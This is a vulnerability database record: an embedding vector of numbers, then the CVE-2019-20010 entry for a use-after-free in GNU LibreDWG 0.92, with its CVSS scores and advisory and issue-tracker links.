-0.010652433149516582, 0.003695741994306445, -0.013974253088235855, 0.018417838960886, 0.007091477047652006, -0.014174257405102253, -0.004174014553427696, 0.0016456921584904194, -0.007308873347938061, 0.000858716550283134, -0.0016380833694711328, 0.010687216185033321, 0.008930652402341366, -0.00248049502260983, 0.013217712752521038, 0.007587140891700983, -0.0043153222650289536, -0.0012641611974686384, -0.002052223775535822, 0.0018696107435971498, 0.018574364483356476, 0.016913454979658127, 0.00018071092199534178, -0.008795865811407566, 0.015200369991362095, 0.009956764057278633, 0.007956715300679207, -0.006021885666996241, 0.005734921898692846, -0.0069871265441179276, 0.007561053615063429, -0.013295975513756275, 0.02007005363702774, -0.0008652384276501834, 0.014339479617774487, -0.0021217907778918743, 0.008465423248708248, 0.004774029366672039, -0.018783066421747208, -0.010504603385925293, 0.0018446100875735283, 0.00026427273405715823, 0.016939543187618256, 0.014713400974869728, -0.006113192066550255, 0.00355878216214478, -0.014148170128464699, -0.0063523282296955585, -0.004067490343004465, 0.007534965872764587, 0.011182880960404873, 0.018122179433703423, -0.01219160109758377, 0.004095751792192459, -0.008369768969714642, 0.0027218053583055735, -0.04991425573825836, -0.010678520426154137, 0.006665379274636507, 0.0038087882567197084, 0.00027718066121451557, 0.008795865811407566, 0.005956666544079781, -0.01715693809092045, 0.002976159332320094, -0.0021522261667996645, 0.0026152809150516987, 0.007813233882188797, -0.010608953423798084, -0.01958308555185795, -0.0055479612201452255, 0.023965800181031227, 0.01598299667239189, 0.01660040393471718, -0.009765454567968845, 0.004708810243755579, 0.00870455987751484, -0.010356773622334003, -0.005682746879756451, 0.003078335663303733, -0.007452355232089758, -0.007126260083168745, 0.00401314115151763, 0.0014087299350649118, -0.033009499311447144, -0.0024131021928042173, 0.011504627764225006, -0.011887245811522007, -0.017983045428991318, -0.0012989445822313428, 0.02224401943385601, 0.016652578487992287, 0.016174307093024254, 0.02687021903693676, 0.005808836780488491, -0.000029993936550454237, 0.01480035949498415, 0.008708907291293144, -0.04935772344470024, 0.016383007168769836, -0.005108819808810949, 0.037009596824645996, -0.008208895102143288, 0.006356676109135151, -0.011095922440290451, -0.005739270243793726, -0.004374019335955381, -0.006687119137495756, -0.008439335972070694, -0.01449600514024496, 0.0053088245913386345, -0.004608807619661093, 0.004426194820553064, 0.008469771593809128, 0.00760453287512064, 0.010226335376501083, 0.013043795712292194, -0.006304501090198755, -0.004080533981323242, 0.003323993878439069, -0.0027544149197638035, 0.005969710182398558, 0.002006570575758815, 0.0038935730699449778, -0.008356724865734577, 0.014348175376653671, 0.007948019541800022, 0.006017537787556648, -0.004717506002634764, -0.02575714886188507, -0.015348199754953384, 0.005100124049931765, 0.009235006757080555, 0.028591999784111977, -0.009704584255814552, 0.013339455239474773, -0.00044566302676685154, 0.024574510753154755, -0.01815696246922016, 0.010591561906039715, 0.015130802989006042, 0.0032457311172038317, -0.009539362043142319, -0.005595788359642029, 0.012269863858819008, 0.007495834492146969, 0.0005421327659860253, 0.019356992095708847, -0.002009831601753831, 0.006408851593732834, -0.02629629150032997, 0.011574194766581059, 0.01073069591075182, -0.0003000072902068496, -0.009035002440214157, 0.017061283811926842, -0.016383007168769836, 0.0018989592790603638, 0.008217590861022472, -0.0050218612886965275, -0.018330881372094154, 0.0035000850912183523, -0.0022261410485953093, -0.006830601021647453, -0.00028913747519254684, -0.005652311258018017, 0.015678642317652702, -0.013887294568121433, 0.010504603385925293, 0.01288727018982172, -0.0025696277152746916, -0.012522043660283089, 0.005291433073580265, -0.025165829807519913, -0.002900070510804653, 0.023722315207123756, 0.00362400128506124, -0.032174695283174515, 0.01708737201988697, 0.011374189518392086, -0.020191796123981476, 0.0058784037828445435, 0.019217858090996742, 0.021791834384202957, -0.005595788359642029, -0.0053175208158791065, -0.016348224133253098, 0.010626344941556454, -0.010382860898971558, 0.01982656866312027, -0.0018196094315499067, -0.01440034992992878, 0.010278510861098766, -0.0007945845136418939, -0.019061332568526268, -0.013130754232406616, 0.013087274506688118, -0.016113435849547386, -0.02064398117363453, -0.0013761203736066818, 0.01248726062476635, -0.022070102393627167, 0.00779584189876914, 0.013069882988929749, -0.003191381925716996, 0.012408997863531113, -0.01315684150904417, -0.007626272272318602, -0.008243679068982601, -0.008378464728593826, -0.019948311150074005, 0.010687216185033321, 0.0026609343476593494, -0.010887221433222294, 0.007582793012261391, 0.00752192223444581, 0.022678812965750694, 0.010817654430866241, -0.016739537939429283, -0.0049783820286393166, 0.015200369991362095, 0.0276702381670475, 0.005269693210721016, 0.023687532171607018, -0.0008652384276501834, -0.009069785475730896, 0.0026022372767329216, -0.004600111860781908, -0.009139352478086948, -0.03147902712225914, -0.007430615369230509, 0.003908790647983551, 0.015017756260931492, 0.01623517833650112, -0.015287328511476517, -0.012826398946344852, 0.0022630984894931316, -0.0023370133712887764, -0.000033339805668219924, -0.033496465533971786, -0.010174160823225975, 0.006343632470816374, 0.00684364465996623, -0.009869805537164211, 0.00603927718475461, -0.013661202043294907, -0.02438320219516754, -0.0010543734533712268, 0.011904637329280376, 0.017217809334397316, 0.00420445017516613, -0.04104447737336159, 0.019200466573238373, 0.00009558656165609136, 0.02194835990667343, 0.014435133896768093, 0.022330977022647858, -0.019930919632315636, -0.003023986704647541, -0.0127568319439888, 0.0022435327991843224, 0.017000412568449974, -0.021635308861732483, -0.012304646894335747, 0.020261362195014954, 0.036731328815221786, 0.001963091315701604, 0.019217858090996742, -0.007552357390522957, 0.0021109208464622498, 0.013548155315220356, 0.017826519906520844, 0.005947970785200596, 0.018070004880428314, -0.001165245776064694, 0.022922296077013016, 0.01876567304134369, -0.02933984436094761, -0.006061017047613859, -0.008734995499253273, 0.025044087320566177, 0.01576559990644455, 0.003960965666919947, 0.006256673950701952, 0.015069931745529175, -0.01789608784019947, -0.012156817130744457, 0.005291433073580265, -0.0024283200036734343, -0.0021228776313364506, -0.01386990211904049, -0.009965459816157818, 0.020035270601511, 0.008030629716813564, 0.015130802989006042, -0.013061187230050564, -0.007774102035909891, -0.0022457067389041185, 0.0017337377648800611, -0.03474866971373558, 0.026661517098546028, -0.0003127793315798044, -0.019443951547145844, -0.0011125270975753665, -0.02520061284303665, -0.007243654225021601, -0.0003698459477163851, -0.0018946112832054496, 0.004813160747289658, 0.009678496047854424, 0.00098208908457309, -0.006847992539405823, -0.016374310478568077, -0.016417790204286575, -0.011643761768937111, -0.002717457478865981, -0.00644363509491086, 0.0025935412850230932, -0.006665379274636507, 0.03888790309429169, -0.008452379144728184, 0.011495932005345821, -0.020157011225819588, 0.026661517098546028, -0.0005005556740798056, 0.009278486482799053, -0.011087225750088692, 0.00020068422600161284, -0.004282712936401367, 0.005447958596050739, -0.0001824772625695914, 0.005287085194140673, 0.0024565814528614283, 0.007930628024041653, -0.009765454567968845, -0.004774029366672039, 0.0050218612886965275, -0.007552357390522957, -0.0028870266396552324, 0.013635113835334778, 0.015469941310584545, 0.0009831760544329882, -0.013678593561053276, -0.04017489030957222, -0.002497886773198843, -0.013191625475883484, -0.007704535033553839, -0.015165586024522781, -0.004647939000278711, 0.012713352218270302, -0.00043316269875504076, -0.011817678809165955, -0.036279141902923584, 0.018383055925369263, 0.012217688374221325, 0.024904953315854073, 0.004060968291014433, 0.0021109208464622498, 0.017148243263363838, 0.001885915407910943, -0.0131829297170043, -0.00001685672759776935, -0.00908717792481184, -0.019113508984446526, 0.006056669168174267, 0.023965800181031227, -0.0021272257436066866, -0.0070306058041751385, 0.005043601151555777, -0.02386144921183586, 0.00048696837620809674, 0.010591561906039715, 0.007978455163538456, -0.03662697598338127, -0.001089156954549253, 0.01786130480468273, -0.009765454567968845, 0.002332665491849184, 0.03495737165212631, -0.010513299144804478, -0.0014282956253737211, -0.01386990211904049, 0.005865360144525766, -0.0015826472081243992, -0.015904733911156654, -0.03372256085276604, -0.012243775650858879, 0.00405879458412528, 0.004115317482501268, 0.008434987626969814, -0.007434963248670101, 0.02499191276729107, -0.004247929435223341, -0.00024660927010700107, 0.006895819678902626, 0.0008913260535337031, -0.0026761521585285664, 0.002834851620718837, 0.012704656459391117, 0.01248726062476635, -0.004341410007327795, 0.01317423302680254, -0.0038283539470285177, -0.017809128388762474, 0.0007228436879813671, -0.002221793169155717, -0.0009108917438425124, 0.0066349441185593605, -0.018800457939505577, -0.015652554109692574, 0.0034326922614127398, -0.002419624011963606, 0.013295975513756275, -0.0049131629057228565, -0.0072740898467600346, -0.0008598035201430321, 0.00787845253944397, 0.004054446239024401, 0.01250465214252472, -0.013426413759589195, 0.004717506002634764, -0.029948554933071136, -0.00813498068600893, -0.010121985338628292, 0.006995822302997112, 0.0016359093133360147, 0.00988719705492258, -0.020504847168922424, 0.002713109366595745, -0.03292253986001015, 0.010148072615265846, -0.009069785475730896, 0.005952318664640188, -0.011939420364797115, -0.012556826695799828, 0.013461196795105934, -0.0012315516360104084, -0.010208943858742714, -0.00386531138792634, 0.007278437726199627, -0.003417474450543523, -0.014669922180473804, -0.003926182631403208, 0.04340974986553192, -0.010556778870522976, 0.008395856246352196, 0.009817630052566528, 0.012878574430942535, -0.00453924061730504, -0.004426194820553064, 0.010843741707503796, -0.009530666284263134, -0.006508853752166033, -0.006534941494464874, 0.003667480545118451, -0.004324018023908138, 0.010078505612909794, -0.008652384392917156, -0.0009402402793057263, -0.00223918491974473, -0.013939469121396542, -0.00003216790355509147, -0.0006174063310027122, 0.018939591944217682, 0.008221939206123352, -0.005995797924697399, 0.011478540487587452, -0.006617552135139704, 0.003789222566410899, 0.0061088441871106625, -0.005956666544079781, 0.00220766244456172, 0.0005755574675276875, -0.0021380954422056675, -0.01682649552822113, -0.015782993286848068, 0.0003801722778007388, 0.006013189908117056, -0.012530739419162273, -0.0026891957968473434, -0.006126236170530319, 0.00110328767914325, -0.027774589136242867, 0.016496052965521812, -0.0011945943115279078, -0.006721902638673782, -0.0014902536058798432, -0.030209429562091827, 0.009313269518315792, 0.015896039083600044, -0.05106211081147194, 0.015669945627450943, -0.022887513041496277, -0.003932704217731953, 0.02961811237037182, -0.002410928253084421, -0.004256625194102526, -0.019461343064904213, -0.008304549381136894, -0.0033500813879072666, -0.00496099004521966, -0.0077871461398899555, -0.004402280785143375, 0.02664412558078766, -0.015200369991362095, -0.006439287215471268, -0.0060523212887346745, 0.009435012005269527, -0.02172226831316948, 0.02200053445994854, 0.025861497968435287, -0.03200078010559082, -0.00610449630767107, 0.02874852530658245, -0.014991668984293938, 0.01977439410984516, 0.008321941830217838, 0.0039000948891043663, -0.019965702667832375, 0.02280055545270443, -0.014548179693520069, -0.011843766085803509, -0.008895868435502052, -0.012826398946344852, -0.004556632600724697, -0.015217761509120464, 0.0014500352554023266, -0.0013695985544472933, 0.011887245811522007, -0.019322209060192108, -0.000013052287613390945, 0.0037457433063536882, 0.0034305183216929436, -0.006034929305315018, 0.030783357098698616, -0.014939493499696255, 0.01507862750440836, -0.0029500718228518963, -0.0033066021278500557, 0.005804488901048899, -0.0032131215557456017, -0.0015989519888535142, 0.004300104454159737, 0.0036370449233800173, -0.013730769045650959, -0.0032696446869522333, 0.006178411189466715, 0.007634968496859074, -0.019983094185590744, -0.024487551301717758, -0.006274065468460321, -0.03194860368967056, 0.017809128388762474, 0.008400204591453075, 0.01169593632221222, 0.0055479612201452255, -0.021513566374778748, 0.0017272159457206726, 0.0024131021928042173, 0.01679171249270439, 0.011982900090515614, 0.005465350113809109, -0.002854417311027646, 0.006747990380972624, -0.010487211868166924, -0.0012511173263192177, 0.0016500401543453336, 0.007243654225021601, 0.009478491730988026, 0.012835094705224037, -0.013469892553985119, 0.01984396018087864, 0.00017228680371772498, -0.019183075055480003, 0.010513299144804478, -0.014461221173405647, 0.015643859282135963, 0.0096350172534585, 0.0009217615588568151, 0.012017683126032352, 0.021113557741045952, -0.027461538091301918, -0.010591561906039715, -0.006930603180080652, -0.008400204591453075, -0.0017685212660580873, -0.004382715094834566, -0.025844106450676918, 0.006547985132783651, 0.015348199754953384, 0.03224426135420799, -0.020209187641739845, -0.0015413418877869844, 0.006552333477884531, 0.0053610000759363174, -0.0014728618552908301, -0.005100124049931765, -0.0072610462084412575, 0.0050349049270153046, 0.011226359754800797, 0.004974034149199724, -0.005795793142169714, -0.014869926497340202, 0.011269839480519295, 0.015548204071819782, 0.006478418596088886, 0.015313415788114071, -0.00359139172360301, -0.0026435425970703363, 0.009556754492223263, 0.015826471149921417, 0.018852632492780685, 0.02173965983092785, -0.0038544414564967155, -0.03645306080579758, 0.00724800257012248, 0.021757051348686218, 0.006608856376260519, 0.010148072615265846, -0.00521751819178462, -0.011208968237042427, 0.0006527332589030266, 0.0024239718914031982, 0.012835094705224037, -0.008882824331521988, -0.0017435206100344658, -0.0041283611208200455, -0.005965362302958965, -0.01707867532968521, 0.017252594232559204, -0.010217639617621899, 0.029113750904798508, 0.001855479902587831, 0.006334936711937189, -0.009669800288975239, -0.006178411189466715, -0.0017391727305948734, 0.02278316207230091, 0.008191503584384918, 0.011226359754800797, 0.010782871395349503, 0.002932680072262883, 0.02737457863986492, 0.0019728741608560085, -0.0004233798536006361, -0.010278510861098766, 0.002250054618343711, 0.017539557069540024, -0.00867847166955471, -0.005521873477846384, 0.01789608784019947, 0.006178411189466715, 0.03069639950990677, -0.0023978843819350004, -0.008478467352688313, -0.014574267901480198, 0.00978284701704979, -0.016922149807214737, -0.030748574063181877, 0.014217737130820751, 0.003978357650339603, 0.0069871265441179276, -0.005743618123233318, -0.0007489312556572258, -0.013765552081167698, 0.006543637253344059, -0.0012837268877774477, -0.010904612950980663, 0.018887415528297424, 0.007982802577316761, 0.01869610697031021, -0.0008049109019339085, 0.017269985750317574, 0.009582841768860817, -0.0021098339930176735, 0.006674075499176979, -0.005613179877400398, -0.024487551301717758, 0.011582890525460243, 0.024504944682121277, -0.03965313732624054, 0.014861230738461018, -0.006330588832497597, 0.012782919220626354, -0.018522189930081367, 0.007243654225021601, 0.013713376596570015, -0.011913333088159561, 0.01250465214252472, -0.008030629716813564, 0.0007614315836690366, 0.006091452669352293, 0.010391556657850742, 0.00935674924403429, 0.012522043660283089, 0.026122374460101128, 0.0019978745840489864, 0.011887245811522007, 0.020817898213863373, 0.0106002576649189, -0.006608856376260519, 0.00468707038089633, 0.003589217783883214, -0.004306626506149769, 0.007652360014617443, -0.022313585504889488, -0.002102225087583065, -0.025391921401023865, 0.025600623339414597, 0.007534965872764587, 0.02365274913609028, -0.017722170799970627, -0.02553105540573597, -0.009600233286619186, -0.00543056707829237, 0.016922149807214737, 0.015817776322364807, 0.014391654171049595, -0.019878745079040527, 0.019183075055480003, -0.006961038801819086, 0.0017380857607349753, 0.020296145230531693, -0.0019424385391175747, -0.002162009011954069, 0.003234861185774207, 0.0028000681195408106, -0.0063523282296955585, 0.028557216748595238, -0.011235055513679981, 0.005826228763908148, 0.016513444483280182, -0.013313367031514645, -0.000935348856728524, -0.005065340548753738, 0.004917510785162449, 0.00008077642269199714, -0.012556826695799828, 0.0072175669483840466, 0.0053610000759363174, -0.03203556314110756, 0.006395807955414057, 0.020713547244668007, -0.012435085140168667, 0.0114089734852314, -0.009791542775928974, -0.0003203882370144129, -0.01632213592529297, 0.02113094925880432, 0.011443756520748138, 0.019600477069616318, 0.0257397573441267, -0.01425252016633749, 0.010243727825582027, 0.000720126205123961, -0.0027370231691747904, -0.006943647284060717, -0.007617576513439417, 0.031600769609212875, -0.015269936993718147, 0.018574364483356476, 0.0036566106136888266, 0.0016837365692481399, -0.02283533848822117, 0.00322181754745543, -0.008661080151796341, 0.002621802967041731, -0.008269766345620155, -0.00509142829105258, 0.010139376856386662, 0.009956764057278633, 0.01604386791586876, 0.006013189908117056, 0.010365469381213188, -0.023426657542586327, 0.006774077657610178, 0.0011228533694520593, -0.027548495680093765, 0.0022348370403051376, -0.020957032218575478, -0.030609440058469772, -0.020035270601511, -0.022087493911385536, 0.0057697053998708725, -0.02880069985985756, 0.009391533210873604, 0.010382860898971558, -0.011861157603561878, -0.011713328771293163, -0.004180536605417728, -0.012443780899047852, 0.001795695861801505, -0.007926279678940773, 0.012522043660283089, 0.004269668832421303, 0.015696033835411072, -0.0031500766053795815, -0.012687264941632748, -0.00309355347417295, 0.0073697445914149284, 0.0030000729020684958, -0.006495810113847256, -0.0002744632074609399, 0.012461172416806221, 0.025722363963723183, -0.03342689946293831, -0.012782919220626354, 0.010748087428510189, 0.006478418596088886, -0.01683519221842289, -0.012678569182753563, -0.009235006757080555, 0.02250489592552185, -0.029965946450829506, 0.00867847166955471, -0.009261094965040684, 0.01126114372164011, 0.0016185176791623235, 0.029252884909510612, 0.008661080151796341, -0.016487358137965202, 0.005900143645703793, 0.0058784037828445435, -0.0015522117028012872, 0.01895698346197605, -0.004969686269760132, 0.022852730005979538, -0.0030870316550135612, -0.0035761739127337933, 0.00739148398861289, -0.004739245865494013, 0.001870697713457048, 0.01678301766514778, 0.0038413978181779385, -0.030731182545423508, -0.005195778328925371, 0.015513421036303043, 0.0020043966360390186, -0.011200272478163242, 0.003813136136159301, -0.014956885948777199, 0.013591635040938854, -0.005239258054643869, 0.017713474109768867, -0.001976134954020381, 0.0006320805987343192, -0.004456629976630211, 0.00815672054886818, -0.00718278344720602, -0.0020489629823714495, -0.002053310861811042, -0.002958767581731081, -0.009695887565612793, -0.01928742602467537, 0.0005024579004384577, -0.01848740689456463, -0.026139765977859497, -0.005839272402226925, 0.009495883248746395, -0.000782084243837744, 0.01315684150904417, 0.0032696446869522333, 0.017539557069540024, 0.00883064977824688, 0.013669897802174091, -0.010652433149516582, -0.017191722989082336, -0.01845262199640274, 0.002347883302718401, 0.014652530662715435, -0.011052442714571953, -0.01741781458258629, -0.004291408695280552, 0.02092224732041359, -0.00016658013919368386, -0.006400155834853649, -0.009704584255814552, -0.006682771258056164, -0.005952318664640188, 0.004334887955337763, -0.02495712786912918, 0.00509142829105258, 0.025583231821656227, 0.008982826955616474, -0.0002669901878107339, -0.017739562317728996, 0.021322257816791534, -0.01020024809986353, 0.025044087320566177, -0.0031370327342301607, 0.027339795604348183, -0.01598299667239189, -0.024278851225972176, -0.013626418076455593, -0.0007473008008673787, 0.0003084314230363816, 0.004534892737865448, -0.016217784956097603, 0.006408851593732834, 0.02116573229432106, 0.004215320106595755, -0.0076001849956810474, -0.0004356084100436419, 0.019061332568526268, -0.022157059982419014, 0.008856737054884434, -0.0003423996386118233, 0.00420227600261569, 0.02010483667254448, 0.004206623882055283, 0.009095873683691025, 0.010000242851674557, 0.012600306421518326, 0.016991717740893364, 0.0064045037142932415, 0.014209041371941566, -0.004634895361959934, -0.002589193405583501, -0.0016174305928871036, 0.008361073210835457, -0.004413150716573, 0.008113240823149681, 0.01822653040289879, 0.013191625475883484, -0.022191844880580902, 0.0001832925045164302, 0.014826447702944279, -0.007004518061876297, -0.008443683385848999, -0.02881809137761593, 0.015687337145209312, -0.011852461844682693, -0.007691491395235062, -0.005134907551109791, -0.001611995743587613, -0.014861230738461018, -0.023687532171607018, -0.02005266211926937, -0.005213170312345028, 0.019148292019963264, 0.01984396018087864, 0.004982729908078909, 0.018104787915945053, 0.02930506132543087, -0.0031957298051565886, -0.013382934033870697, -0.01680910401046276, -0.0009848065674304962, 0.0018000437412410975, 0.0008940434781834483, -0.022417936474084854, -0.004104447551071644, -0.0034413880202919245, 0.013122058473527431, 0.0045740241184830666, 0.014774272218346596, 0.0056610070168972015, -0.0018467840272933245, -0.012287255376577377, 0.01874828152358532, 0.015574292279779911, 0.01193072460591793, 0.013843814842402935, 0.014295999892055988, 0.008061065338551998, -0.009452403523027897, -0.004176188725978136, 0.0036848722957074642, 0.01085243746638298, 0.02118312381207943, 0.0007880626362748444, 0.04452282190322876, 0.02333969809114933, 0.016435181722044945, -0.0028435473795980215, 0.014443829655647278, 0.00008797768532531336, -0.0014967755414545536, 0.002250054618343711, 0.027896329760551453, 0.004247929435223341, 0.010556778870522976, -0.0017217809800058603, -0.010539386421442032, 0.010008938610553741, 0.01411338709294796, -0.004917510785162449, 0.0072175669483840466, 0.02770502120256424, -0.012617697939276695, -0.0060523212887346745, -0.010391556657850742, 0.00678277388215065, 0.015904733911156654, -0.004432716406881809, 0.00034403009340167046, -0.008495858870446682, 0.006326240953058004, 0.03589652478694916, -0.004360975697636604, -0.001457644160836935, 0.006243630312383175, 0.014182954095304012, -0.022644028067588806, -0.027583278715610504, 0.02794850617647171, 0.013139449991285801, 0.004365323577076197, -0.011330710723996162, -0.012826398946344852, 0.007430615369230509, -0.0109828757122159, -0.02008744515478611, 0.0012380735715851188, 0.02283533848822117, -0.00017568361363373697, -0.006439287215471268, 0.0015206891112029552, -0.002623976906761527, -0.01655692420899868, 0.008769778534770012, 0.00046386997564695776, -0.002454407513141632, 0.003160946536809206, 0.009165440686047077, -0.007082780823111534, -0.010348077863454819, 0.004119665361940861, 0.007452355232089758, 0.014287304133176804, -0.017296072095632553, -0.01953090913593769, -0.016887366771697998, -0.0219657514244318, -0.023670140653848648, -0.0022054885048419237, -0.0005089797778055072, 0.0212005153298378, -0.032713837921619415, -0.0034283441491425037, 0.00747409462928772, 0.009800238534808159, 0.004187058191746473, -0.008434987626969814, -0.0027739806100726128, -0.00156308151781559, 0.028713742271065712, 0.009539362043142319, -0.0010619823588058352, 0.01396555732935667, 0.0008223025943152606, 0.00975675880908966, 0.008565425872802734, 0.016469966620206833, -0.015652554109692574, 0.0076567078940570354, 0.015296024270355701, -0.01003502681851387, 0.006821905262768269, 0.003817484248429537, 0.011208968237042427, 0.01400034036487341, 0.01791347935795784, -0.004934902768582106, -0.0004540871304925531, 0.012182905338704586, -0.005278389435261488, 0.0011125270975753665, 0.009208919480443, -0.011652457527816296, 0.004660983104258776, -0.006978430785238743, 0.0076567078940570354, 0.0022522287908941507, -0.012513347901403904, -0.001072308630682528, -0.008204547688364983, 0.021061381325125694, 0.01571342535316944, -0.015826471149921417, -0.00042365159606561065, 0.0041935802437365055, -0.0005565352621488273, 0.0003019095165655017, -0.005265345331281424, -0.010756783187389374, -0.01056547462940216, 0.002297881990671158, -0.010287206619977951, -0.013078578747808933, -0.027548495680093765, -0.0002926701563410461, 0.017591731622815132, -0.0051870825700461864, -0.022661421447992325, 0.0065262457355856895, 0.008604557253420353, -0.029270276427268982, -0.003078335663303733, 0.014817751944065094, 0.002758762799203396, 0.016165610402822495, -0.0010299163404852152, 0.013139449991285801, 0.009121960960328579, 0.0106002576649189, 0.03507911413908005, -0.0010386122157797217, 0.015817776322364807, -0.012261168099939823, -0.0017543905414640903, -0.003223991487175226, -0.005413175094872713, -0.001982657006010413, -0.002463103272020817, -0.029235493391752243, -0.008126284927129745, -0.01071330439299345, 0.014817751944065094, 0.012895965948700905, 0.020504847168922424, -0.007478442974388599, -0.004045750480145216, -0.00026182702276855707, 0.003965314012020826, 0.0016391703393310308, 0.007587140891700983, -0.006208846811205149, -0.000352725968696177, 0.0037913965061306953, 0.0037653089966624975, -0.005956666544079781, 0.07673230022192001, -0.006226238328963518, 0.016339527443051338, -0.0020304841455072165, -0.0035370425321161747, -0.011965508572757244, -0.0011228533694520593, -0.007439311593770981, -0.03262688219547272, 0.013391629792749882, 0.013382934033870697, 0.0001169186070910655, 0.01533080730587244, -0.014461221173405647, -0.0010820915922522545, -0.016991717740893364, -0.00692625530064106, -0.0010011113481596112, -0.002408754313364625, -0.013200321234762669, 0.005808836780488491, 0.011322014033794403, 0.025357138365507126, 0.009043698199093342, 0.0007146912976168096, 0.006308848969638348, -0.0018033047672361135, 0.013130754232406616, 0.006395807955414057, -0.04187927767634392, 0.0198091771453619, -0.009495883248746395, 0.018348272889852524, -0.006213194690644741, 0.008765430189669132, 0.028296340256929398, 0.00855238176882267, 0.014148170128464699, -0.006004493683576584, -0.03253992274403572, 0.011435060761868954, -0.005608831997960806, -0.005347955971956253, 0.004587068222463131, -0.010139376856386662, 0.020157011225819588, -0.00684364465996623, -0.01678301766514778, 0.009139352478086948, 0.003095727413892746, 0.0131829297170043, 0.002617454854771495, -0.00811758916825056, 0.007069737184792757, -0.007956715300679207, 0.0013098145136609674, -0.0010353513062000275, 0.009591537527740002, -0.006604508496820927, -0.01046981941908598, -0.012722048908472061, -0.020713547244668007, -0.0011837244965136051, 0.0053610000759363174, -0.01219160109758377, 0.01030459813773632, 0.003191381925716996, 0.013991644605994225, -0.008930652402341366, 0.012539435178041458, 0.0028261556290090084, -0.006356676109135151, -0.019322209060192108, -0.010974179953336716, -0.0038587895687669516, -0.016339527443051338, 0.022070102393627167, -0.014035124331712723, -0.00013111732550896704, -0.009243703447282314, -0.0028413734398782253, -0.013626418076455593, -0.022191844880580902, -0.011226359754800797, 0.006500157993286848, -0.0014935146318748593, -0.009452403523027897, -0.009295878000557423, -0.014626442454755306, 0.006878428161144257, 0.01207855436950922, -0.0026152809150516987, -0.009895892813801765, 0.0028131119906902313, -0.0050870804116129875, -0.013095970265567303, -0.003356603439897299, 0.00016046586097218096, -0.0037240036763250828, 0.009052393957972527, 0.005447958596050739, 0.0019283078145235777, -0.015452549792826176, 0.0034326922614127398, -0.01193072460591793, -0.019687434658408165, -0.008561077527701855, -0.02556583844125271, -0.006308848969638348, -0.014339479617774487, 0.010913308709859848, 0.007339308969676495, -0.0002640009915921837, -0.00720017496496439, 0.012322038412094116, 0.02010483667254448, 0.026400642469525337, 0.01705258898437023, 0.016939543187618256, 0.011756807565689087, -0.0014011210296303034, 0.010652433149516582, 0.011965508572757244, -0.003882703138515353, 0.019878745079040527, -0.00975675880908966, 0.014722096733748913, 0.01869610697031021, 0.01653083600103855, 0.01951351761817932, -0.003804440377280116, -0.019200466573238373, 0.009321966208517551, 0.014739489182829857, -0.0026044112164527178, 0.019374383613467216, 0.005700138863176107, 0.010695911943912506, 0.014991668984293938, 0.0023217955604195595, -0.014409045688807964, 0.07548009604215622, -0.010026331059634686, 0.00046658742940053344, -0.034626930952072144, -0.014539483934640884, -0.017539557069540024, -0.014756880700588226, -0.0066349441185593605, -0.024261459708213806, 0.03507911413908005, 0.008495858870446682, 0.021270083263516426, 0.0037196557968854904, 0.00020584739104378968, 0.014426438137888908, -0.013217712752521038, 0.017226506024599075, -0.002958767581731081, -0.0007440398330800235, -0.0066349441185593605, 0.006600160617381334, 0.00435010576620698, 0.003384864889085293, 0.01466122642159462, -0.00016888997924979776, 0.0006266456912271678, -0.002163096098229289, 0.017713474109768867, 0.009617624804377556, -0.01873089000582695, -0.0046044597402215, -0.013243800029158592, -0.00481750862672925, 0.024835387244820595, 0.010000242851674557, 0.0036566106136888266, 0.013591635040938854, 0.007065389305353165, 0.01506123598664999, 0.01626996137201786, -0.010791567154228687, -0.030052904039621353, 0.014991668984293938, 0.012913357466459274, -0.010504603385925293, -0.012765527702867985, -0.019913528114557266, -0.003804440377280116, -0.003206599736586213, 0.003787048626691103, -0.007295829709619284, 0.01169593632221222, -0.015417765825986862, -0.012122034095227718, 0.008291506208479404, -0.0005886012804694474, -0.01341771800071001, 0.009426316246390343, 0.005139255430549383, 0.002960941521450877, -0.022452719509601593, 0.0011739416513592005, 0.0055392649956047535 ]
2,089
CVE-2019-20010
2019-12-27T01:15:13.320000
An issue was discovered in GNU LibreDWG 0.92. There is a use-after-free in resolve_objectref_vector in decode.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00033.html" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00045.html" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/176" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/176#issuecomment-568643383" } ]
